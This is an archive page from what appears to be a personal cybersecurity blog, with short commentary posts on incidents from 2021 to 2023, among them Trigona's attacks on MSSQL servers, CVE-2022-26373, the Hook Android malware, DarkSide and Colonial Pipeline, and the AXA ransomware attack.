Category Archives: cyber security incident news highlight

Hong Kong Cyberport is plagued by ransomware! (15th Sep 2023)

Preface: On 13th Sep 2023, There is another new development in the cyberport hacker incident, said wepro180[.]com. The 400GB of stolen data was disclosed on the dark web on Tuesday (12/9), including employee salaries, applicant resumes, credit card information and other sensitive documents. Cyberport said it has directly contacted those who may be affected.

Think about it after you know it

About the Computer Functional Footprint – Business users are storing some data in SharePoint lists. Perhaps enterprise firm operation management need to do report and analytic. So, it is common to select popular solution. ETL processes extract data from different sources, transforms it, and loads it into data warehouse (MSSQL).

By default the CLR is not enabled in SQL Server. When you use SQL server CLR function, you can code stored procedures, triggers,  user-defined functions, user-defined aggregates, and user-defined types using Microsoft .NET code; e.g. Visual Basic .NET or C#. 

For example: table-value function (TVF) written using the CLR function.

The rise of the ransomware power

In April 2023, Trigona began targeting compromised MSSQL servers by stealing credentials through brute-force methods, according to observations by cybersecurity experts. But the group began operating actively on the Internet around late October 2022.

Trigona’s operators use CLR shell on attacks launched against MS-SQL servers. Perhaps their aim of targeting SQL servers which contains design weakness. All versions of Trigona employ  TDCP_rijndael (AES) to encrypt the target files currently.

My comment: Any software and hardware design is to help people improve operating efficiency. In theory we all know about protection, defense and mitigation. However, when dealing with today’s demanding business world and multi-solution environments. Talk about cybersecurity should be accompanied by practical support. However, the market is highly competitive and the establishment of any new project will bring the burden of network security. Sometimes it’s a trade-off on the part of the business owner or management team.

Whether it is the last round of remediation on CVE-2022-26373? Intel’s Enhanced Indirect Branch Restricted Speculation (eIBRS) – 6th Feb 2023

Preface: CVE-2022-26373 technical detail has released to public on 9th Aug 2022. Till end of Jan, 2023 it still has update on this vulnerability. For example, Red Hat fixed this vulnerability in their product Enterprise Linux 7 on 3rd Nov 2022. Since then it conducting the remediation to their product line. Perhaps the remediation on 24th Jan 2023 to Red Hat Virtualisation 4 for Red Hat Enterprise Linux 8 is the final round.
Looks like this is a CPU vendor specific bug. As a result, some vendors have stated that their products are not affected by this vulnerability. Whether it a absolute answer? All will depends on the use of CPU processor brand.

Background: From technical point of view, Indirect Branch Restricted Speculation (IBRS) is an indirect branch control mechanism that restricts speculation of indirect branches. See below for technical details.
CPUID.(EAX=7H,ECX=0): If EDX[26] is 1, it means support IBRS and IBPB,
OS can write IA32_SPEC_CTRL0 and IA32_PRED_CMD0 to control the behavior of indirect branch predictor.
IBRS finally failed to enter the kernel due to function problems, however when when the vm is switched. It can get into kernel. This weakness found in 2018 earlier stage.

Vulnerability details: A flaw was found in hw. In certain processors with Intel’s Enhanced Indirect Branch Restricted Speculation (eIBRS) capabilities, soon after VM exit or IBPB command event, the linear address following the most recent near CALL instruction prior to a VM exit may be used as the Return Stack Buffer (RSB) prediction.
Non-transparent sharing of return predictor targets between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access.

Official announcement – For details, see URL – https://access.redhat.com/security/cve/cve-2022-26373

What is the value of the Trusted Execution Environment (TEE) ? (20th JAN 2023)

Preface: Some said, found malware lets cybercriminal remotely manipulate your Android.

Background: The full name of TEE is trusted execution environment, which is an area on the CPU of mobile devices (smart phones, tablets, smart TVs). The role of this area is to provide a more secure space for data and code execution, and to ensure their confidentiality and integrity.

Other TEE operating systems are traditionally supplied as binary blobs by third-party vendors or developed internally. Developing internal TEE systems or licensing a TEE from a third-party can be costly to System-on-Chip (SoC) vendors and OEMs.

Trusty is a secure Operating System (OS) that provides a Trusted Execution Environment (TEE) for Android. A Trusty application is defined as a collection of binary files (executables and resource files), a binary manifest, and a cryptographic signature. At runtime, Trusty applications run as isolated processes in unprivileged mode under the Trusty kernel.

Technical details: According to headline news, a new Android malware named ‘Hook’ is being sold by cybercriminals, boasting it can remotely take over mobile devices in real-time using VNC (virtual network computing). said bleepingcomputer news.

For details, please refer to URL – https://www.bleepingcomputer.com/news/security/new-hook-android-malware-lets-hackers-remotely-control-your-phone/

Speculation: If this reported malware achieves their goals, do you think they will relies on vulnerability such as CVE-2023-21420?

Solution: To avoid Android malware, you should only install apps from the Google Play Store.

Here’s wishing you a Happy Chinese New Year 2023.

Headline news: FAA system outage disrupts thousands of flights across U.S. (12th Jan 2023)

Preface: Thousands of flights across the U.S. were delayed Wednesday after a Federal Aviation Administration pilot alert system failed overnight, prompting a nationwide halt to departures. said CNBC news.

Headline news – https://www.cnbc.com/2023/01/11/faa-orders-airlines-to-pause-departures-until-9-am-et-after-system-outage.html

Background: The Department of Homeland Security published the following opinion piece four years ago.

The GPS system is now considered a “crosssector dependency” for the Department of Homeland Security’s (DHS) 16 designated critical infrastructure sectors. GNSS is vulnerable to jamming and natural interference. When GNSS is denied, PNT information can be seriously affected in ways that increase risks to the safety of navigation.

My observation: Perhaps the incident was not caused by a cyber attack. But industry experts know that the overall system architecture will be combined with OS vendor-dependent drivers.

For example: if the driver is written as a specify standard driver using user-mode extensions is not recommended because this model will likely require more memory usage. However, this specify standard is available on all platforms and it is strongly recommended to use the driver written in user mode.

So, the function is not only OS specific, it also including 3rd party vendor to do the software development. As a matter of fact, aero industry is a special zone. The current computer technology is also involving such zone. In computer world nowadays, the patch to vulnerability is common. So, who can say that this is a trust zone and it is without vulnerability forever.

The evasion technique of Ring 3 continues to improve. Since this is the entry point. Therefore Layer 7 with deep packet inspection is the bases for defensive technique. (6th Dec 2021)

Preface: In fact, despite the excel icon, the XLL file is a Dynamic Linked Library, a binary executable file.

Background: The number of data breaches as of September 30, 2021 has exceeded 17% of the total number of incidents in 2020 (1,291 breaches in 2021, and 1,108 breaches in 2020).

The fundamental objective of MS office products goal to increase the office automation efficiency. Before MS product born, type writer, carbon copy and copy machine coverage is fully utilized. When virus appear in early 90s. The evolution of cyber attack from disruption extend to suspend the office operation. Fundamentally, the role of automation software are operations. Perhaps there is no prefect things in our world. From certain view point, cyber criminals exploit the product design weakness is misused. On the other hand design weakness can be group to mis-config. When cyber criminals abuse above two matters. The software is a weapon. Heard some of the domain expert separate I.T and O.T. But MS office also become one of the operation components in their backend operation. What if MS office suddenly become a cyber attack tools. What they can be do?

If the different in between I.T and O.T are safety and longer product life cycle. Apart from safety, the soft ware product life cycle is shorter comparing ten years ago. However hardware is driven by software driver under industrial automation. So it is clear to understand that if O.T product life cycle longer than traditional I.T. Therefore the product end of life and end of support require to focus in this area. Otherwise, when similar of incident occurs, the benefits will give to cyber attacker.

Security Focus: Mshta.exe is a signed Microsoft application that runs Microsoft HTML Applications (HTA) files. These are HTML files that execute JavaScript or VBScript outside of the browser, with the full permission of the executing user.

Furthermore HTA files will run automatically if a user double clicks on them, because of this HTA files are excellent for Phishing, Malvertising, or Waterhole attacks where the user will click on the file and infect themselves. As a matter of fact, lack of security awareness is the potential weakness. If you are interested of HTA attack scenario. Please refer to attached diagram.

But who wants to know a simple way to set up compensation control in your office or industrial area?
If the system infrastructure had integrate to internet, clean DNS service, SIEM and defense including managed security service, local defense (antivirus) will be the defense baseline.
Be my guest, see whether you have time to think it over of this topic.

Kubernetes Hardening Guidance by NSA & CISA (3rd Aug 2021)

Preface: Docker helps to “create” containers, and Kubernetes allows you to “manage” them at runtime. What is Kubernetes Security? That is Cloud, Cluster, Container and code.

Background: Kubernetes is commonly targeted for three reasons observing by NSA and CISA. They are data theft, computational power theft, or denial of service. Cyber attacks encountered in the Kubernetes environment in 2020. Details are as follow:

Capital One – Occurring in 2019, this breach saw 30GB of credit application data affecting about 106 million people being exfiltrated.
A mis-configured firewall that allowed an attacker to query internal metadata and gain credentials of an Amazon Web Services
Docker hub – Attackers managed to plant malicious images in the Docker hub. unknowingly deployed cryptocurrency miners in the form of Docker
containers that then diverted compute resources toward mining cryptocurrency for the attacker.
Microsoft Azure – Microsoft is another organization that’s been seeing a lot of cryptojacking woes of its own. After disclosing that there was a large-scale cryptomining attack against Kubernetes cluster in Azure in April 2020.
Telsa – Automaker Tesla was one of the earlier victims of cryptojacking when a Kubernetes cluster was compromised due to an administrative
console not being password protected.(Mis-configuration)
Jenkins – Hackers managed to exploit a vulnerability in Jenkins to cryptomine to the tune of about $3.5 million, or 10,800 Monero in 18 months. In Docker’s operation environment, it was discovered that six malicious images had been collectively pulled over 2 million times, that’s 2 million users potentially mining Monero for the attacker.

To avoid similar incidents from happening – The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Technical Report, “Kubernetes Hardening Guidance,” Primary actions include the scanning of containers and Pods for vulnerabilities or mis-configurations, running containers and Pods with the least privileges possible, and using network separation, firewalls, strong authentication, and log auditing. Please refer to the link for details – https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2716980/nsa-cisa-release-kubernetes-hardening-guidance/

DarkSide Ransomware ready to move. Operational Technology (OT) should staying alert (7-7-2021)

Preface: IDC report predicted that By 2024, 60% of industrial organizations will integrate data from edge OT systems with cloud-based reporting and analytics, moving from single-asset views to sitewide operational awareness.

Background: PowerShell provides an adversary with a convenient interface for enumerating and manipulating a host system after the adversary has gained initial code execution.

Security Focus: According to the observation of the security company. You can use PowerShell to execute various Base64 encoding commands. The trend of operation technology will be programmed and developed on powershell.
Cybercriminals responsible for ransomware activities often try to delete them so that their victims cannot restore file access by restoring to shadow copies. The method is to use this (Invoke-ReflectivePEInjection to directly inject DLL into PowerShell).
Meanwhile, they require system administrator privileges, so they rely on zero-day and unpatched victim workstations for privilege escalation.

Remark: What’s more telling is the inclusion of function names that correspond with a PowerShell payload called “Invoke-ReflectivePEInjection”, which lets an attacker inject a dynamic link library (DLL) directly into PowerShell.

Should you have interested of above details. CISA Publishes Malware Analysis Report and Updates Alert on DarkSide Ransomware. For more details, please refer to link – https://us-cert.cisa.gov/ncas/alerts/aa21-131a

Headline News – unauthorized access to japan government systems via Fujitsu ProjectWeb – 28-05-2021

Headline News – The incident affected the Ministry of Land, Infrastructure, Transport and Tourism, Ministry of Foreign Affairs, Cabinet Office and Narita Airport. The stolen data included files stored by government employees on the cloud-based collaboration and file sharing platform ProjectWEB, which was launched by Fujitsu in the mid-2000s and was very popular among Japanese civil servants.
According to Japanese media reports, hackers stole documents containing employees of the Ministry of Land, Infrastructure, Transportation and Tourism and extended more than 76,000 email addresses, but the government did not confirm this information.

Background: ProjectWEB is a a cloud-based enterprise collaboration and file-sharing platform that Fujitsu has operated since the mid-2000s, and which a number of agencies within the Japan government currently use.

One of the possibilities of data leakage in this accident:
If daily operation in many small projects will go through web base management system. Furthermore, daily communication between project managers and project members uses Excel to complete status management and quality management. If excel spreadsheet encounter design weakness (CVE-2017-0006, CVE-2017-0019, CVE-2017-0020, CVE-2017-0030, CVE-2017-0031, and CVE-2017-0053). Therefore, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted document. As a result, the data breaches will be occurred.

Headline News – https://www3.nhk.or.jp/nhkworld/en/news/20210526_28/

Aforementioned – Insurance company infected by ransomware – 25th May 2021

News feed: AXA Group announced on Sunday (16-05-2021) that the company has become a victim of a ransomware attack. Axa Hong Kong said there has been no evidence that data processed by Inter Partners Asia in markets other than Thailand have been affected by the targeted ransomware attack. No official announcement till today to update this incident.

Technology exploration: Avaddon ransomware performs an encryption in offline mode using AES-256 + RSA-2048 to encrypt files. With AES128-bit key, the task of cracking AES by checking each of the 2128 possible key values (a “brute force” attack) is so computationally intensive that even the fastest supercomputer would require, on average, more than 100 trillion years to do it. Microsoft .NET Cryptography library is capable to encrypt and decrypt file on his own.
The Windows 10 operating system incorporates the . NET Framework 4 installed and enabled by default. Therefore cybercriminal can share this service. For more details, please refer to attached document.

What is the consequence if AXA underestimate this matter? Or it is just a bluff!

A similar type of attack (files encrypted with RSA-2048 and AES-128 passwords) will allow cyber-criminals to gain access through remote control systems. After the machine is infected with the ransomware. The data exfiltration will be occurred. In fact, the hacker group claimed to have stolen 3 terabytes of data, including a long list of information: ID cards, passport copies, customer claims, reserved agreements, denied reimbursements, payments to customers, contract and reports, customer IDs and bank account scanned papers, hospital and doctor reserved material (private investigation for fraud) and customer medical reports including HIV, hepatitis, STD and other illness reports.

Latest news: https://www.thestandard.com.hk/section-news/section/2/230327/Axa-HK-unaffected-by-cyberattack

Cyber attack shuts down U.S. fuel pipeline ‘jugular,’ said Headline News – 9th May 2021

Preface: The hacker group claimed that its ransomware attacks were only used for “right targets.” The organization claimed that they only targeted ransomware attacks and large profitable companies to “make the world a better place.”

Background: Cyber attacks in the oil and gas industry can threaten an organisation’s information technology (IT), its operational technology (OT) and any internet of things (IoT) systems in place.
Last year, the security department expressed such concerns.

Security Focus: The hacking team is very active on hack forums and keeps its customers updated with news related to the ransomware. Speculated that attacker gaining an initial foothold in the network not limited to email phishing. Perhaps they exploit SSL VPN design weakness or Microsoft Zero day. In the Oil and Gas Industry . It is common of the implementation of OPC UA technology. It is hard to avoid to using Microsoft product. Even though their OPC UA is running on a linux base machine.But Darkside 2.0 has fastest encryption speed on the market, and it capable for Windows and Linux versions. So this related thing started the story.

Headline News – https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/